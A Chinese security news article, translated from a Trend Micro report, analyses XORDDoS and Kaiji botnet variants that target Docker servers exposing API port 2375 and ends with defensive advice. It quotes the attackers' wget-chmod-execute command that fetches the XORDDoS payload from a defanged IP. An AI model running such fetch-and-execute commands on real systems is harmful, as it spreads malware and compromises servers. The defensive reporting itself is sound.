Linux僵尸网络最新变种现身:Docker服务器惨遭殃及 - 嘶吼 RoarTalk – 网络安全行业综合服务平台,4hou.com

Linux僵尸网络最新变种现身:Docker服务器惨遭殃及

ang010ela 新闻 2020-06-29 11:15:00
608548
收藏

导语:​研究人员发现XORDDoS和Kaiji变种攻击暴露了Docker API端口的服务器。

研究人员近期发现了2个攻击Docker服务器的Linux僵尸网络的变种,分别是XORDDoS 恶意软件和Kaiji DDoS恶意软件。将Docker 服务器作为目标是XORDDoS和 Kaiji恶意软件的新变化,之前这两款恶意软件的目标是云系统中的Linux 主机。最近Kaiji首次被曝影响物联网设备。攻击者常常使用僵尸网络在扫描了SSH 和Telnet端口后执行暴力破解攻击。这两款恶意软件也搜索了暴露2375 端口的Docker服务器。2375端口是Docker API使用的一个端口,用于非加密或非认证的通信。

这两个恶意软件变种的攻击方法有明显的差异。XORDDoS 攻击会利用Docker服务器来感染服务器上的容器,而Kaiji 攻击会在感染的服务器上部署自己的容器,用于DDoS 恶意软件的安装。

XORDDoS 恶意软件分析

XORDDoS 恶意软件的感染是从攻击者检索暴露Docker API端口(2375)的主机开始的。然后,发送一个命令来列出Docker服务器上的所有容器。然后,攻击者执行以下命令,用XORDDoS 恶意软件来感染所有的容器:

wget hxxp://122[.]51[.]133[.]49:10086/VIP –O VIP
 
chmod 777 VIP
 
./VIP

XORDDoS payload 使用了其他攻击中的XOR key来加密字符串,以及与C2 服务器进行通信。也可以在自己的机器上创建多个副本作为驻留机制。

图 1.  XORDDoS创建多个副本的代码段

Payload会启动SYN、ACK、DNS等DDoS 攻击类型。

图 2. XORDDoS 启动不同类型DDoS攻击的代码段

恶意软件可以下载和执行下一阶段的恶意软件或对自己进行升级。

图 3. 表明XORDDoS下载和升级自己的代码段

恶意软件会收集以下与发起DDoS 攻击相关的数据:

· CPU信息;

· 运行进程的MD5;

· 内存信息;

· 网络速度;

· 运行进程的PID。

需要注意的是XORDDoS 恶意软件变种中的大多数恶意行为都在之前的恶意软件变种中出现过。

研究人员进一步分析攻击者的URL发现,其他恶意软件也攻击过Docker API,比如Dofloo/AESDDoS Linux 僵尸网络的变种Backdoor.Linux.DOFLOO.AB。

Kaiji 恶意软件分析

与 XORDDoS 恶意软件相似,Kaiji 现在的攻击目标也是Docker 服务器。其运营者扫描了网络上暴露了2375 端口的主机。找到目标后,会部署一个伪造的ARM容器来执行Kaiji 二进制文件。

123.sh 脚本会下载和执行恶意软件payload——Linux_arm。之后,脚本会移除DDoS 操作不需要的其他的Linux二进制文件:

图 4. 下载和执行123.sh的查询

Figure 5. Code snippet showing the removal of Linux binaries 图 5. 表明移除Linux二进制文件的代码段

Payload linux_arm是Kaiji DDoS 恶意软件会执行以下DDoS 攻击:

· ACK 攻击;

· IPS 欺骗攻击;

· SSH 攻击;

· SYN 攻击;

· SYNACK 攻击;

· TCP 洪泛攻击;

· UDP 洪泛攻击。

恶意软件会收集以下数据,用于前述的攻击中:

· CPU信息;

· 目录;

· 域名;

· 主机IP 地址;

· 运行进程的PID;

· URL 方案。

如何应对?

恶意软件变种背后的攻击者还在不断地对恶意软件进行升级、加入新的功能,因此可以发起针对攻击入口点的攻击。在云端,Docker 服务器越来越多的成为攻击者的目标。因此,研究人员建议采取以下措施来保护Docker 服务器:

· 保护容器主机安全。利用监控工具来确保容器操作系统中的主机容器的安全。

· 保护网络环境安全。使用IPS和web过滤来提供内部和外部流量的可视性。

· 确保管理栈的安全。监控和确保容器注册表的安全,锁定Kubernetes 安装。

最佳实践:

· 遵循推荐的最佳安全实践。

· 使用安全工具来扫描和确保容器安全。

本文翻译自:https://blog.trendmicro.com/trendlabs-security-intelligence/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers/如若转载,请注明原文地址:
  • 分享至
取消

感谢您的支持,我会继续努力的!

扫码支持

打开微信扫一扫后点击右上角即可分享哟

发表评论

 
本站4hou.com,所使用的字体和图片文字等素材部分来源于原作者或互联网共享平台。如使用任何字体和图片文字有侵犯其版权所有方的,嘶吼将配合联系原作者核实,并做出删除处理。
©2022 北京嘶吼文化传媒有限公司 京ICP备16063439号-1 本站由 提供云计算服务